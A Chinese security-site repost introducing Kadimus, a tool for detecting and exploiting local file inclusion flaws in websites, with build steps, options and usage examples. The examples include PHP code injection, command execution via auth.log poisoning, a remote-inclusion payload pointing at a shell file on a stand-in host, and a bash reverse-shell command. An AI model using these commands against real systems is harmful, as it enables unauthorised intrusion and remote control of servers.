安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 神兵利刃 > 本地文件包含(LFI)漏洞检测工具 – Kadimus

本地文件包含(LFI)漏洞检测工具 – Kadimus

时间:2015-05-01来源: 作者:phper点击:
Kadimus是一个用于检测网站本地文件包含(LFI)漏洞的安全工具。特性检测所有URL参数/var/log/auth.logRCE/proc/self/environRCEphp://inputRCEdata://textRCE源代码泄露检…

本地文件包含(LFI)漏洞检测工具 – Kadimus //本文来自安云网

Kadimus是一个用于检测网站本地文件包含(LFI)漏洞的安全工具。

//内容来自AnYun.ORG

特性

//本文来自安云网

检测所有URL参数
/var/log/auth.log RCE
/proc/self/environ RCE
php://input RCE
data://text RCE
源代码泄露检测
多线程扫描
HTTP命令执行漏洞
代理支持 (socks4://, socks4a://, socks5:// ,socks5h:// and http://) //本文来自安云网 

编译 //内容来自安云网

安装libcurl:

//内容来自安云网

CentOS/Fedora

//内容来自安云网

# yum install libcurl-devel
Debian based
# apt-get install libcurl4-openssl-dev //内容来自AnYun.ORG 

安装libpcre:

//内容来自安云网

CentOS/Fedora

//本文来自安云网

# yum install libpcre-devel //本文来自安云网 

Debian based

//内容来自安云网

# apt-get install libpcre3-dev //本文来自安云网 

安装libssh:
//本文来自安云网

CentOS/Fedora //本文来自安云网

# yum install libssh-devel 
//内容来自安云网

基于Debian //内容来自AnYun.ORG

# apt-get install libssh-dev 
//内容来自AnYun.ORG

最后执行

//内容来自AnYun.ORG

$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make 

//本文来自安云网

选项 //本文来自安云网

 -h, --help                    Display this help menu
  Request:
    -B, --cookie STRING         Set custom HTTP Cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry-times NUMBER        number of times to retry if connection fails
    --proxy STRING              Proxy to connect, syntax: protocol://hostname:port
  Scanner:
    -u, --url STRING            Single URI to scan
    -U, --url-list FILE         File contains URIs to scan
    -o, --output FILE           File to save output results
    --threads NUMBER            Number of threads (2..1000)
  Explotation:
    -t, --target STRING         Vulnerable Target to exploit
    --injec-at STRING           Parameter name to inject exploit
                                (only need with RCE data and source disclosure)
  RCE:
    -X, --rce-technique=TECH    LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP Request
    -r, --reverse-shell         Try spawn a reverse shell connection.
    -l, --listen NUMBER         port to listen
    -b, --bind-shell            Try connect to a bind-shell
    -i, --connect-to STRING     Ip/Hostname to connect
    -p, --port NUMBER           Port number to connect
    --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)
    --ssh-target STRING         Set the SSH Host
    RCE Available techniques
      environ                   Try run PHP Code using /proc/self/environ
      input                     Try run PHP Code using php://input
      auth                      Try run PHP Code using /var/log/auth.log
      data                      Try run PHP Code using data://text
    Source Disclosure:
      -G, --get-source          Try get the source files using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (Default: stdout) //内容来自安云网 


测试示例

//内容来自AnYun.ORG

扫描:
//内容来自安云网

./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0 //内容来自AnYun.ORG 

获取文件源码:
//内容来自AnYun.ORG

./kadimus -t localhost/?pg=contact -G -f "index.php" -O local_output.php --inject-at pg 
//内容来自AnYun.ORG

执行php代码:
//本文来自安云网

./kadimus -t localhost/?pg=php://input -C '<?php echo "pwned"; ?>' -X input 

//本文来自安云网

命令执行:
//本文来自安云网

./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost //内容来自AnYun.ORG 

检查远程文件包含(RFI)漏洞:
//内容来自安云网

/* http://bad-url.com/shell.txt */ <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?> 
//内容来自安云网

反弹shell:

//内容来自AnYun.ORG

./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0 

//内容来自安云网

下载地址 //本文来自安云网

[整理/phper,安云网转载]

//内容来自安云网

顶一下
(1)
100%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容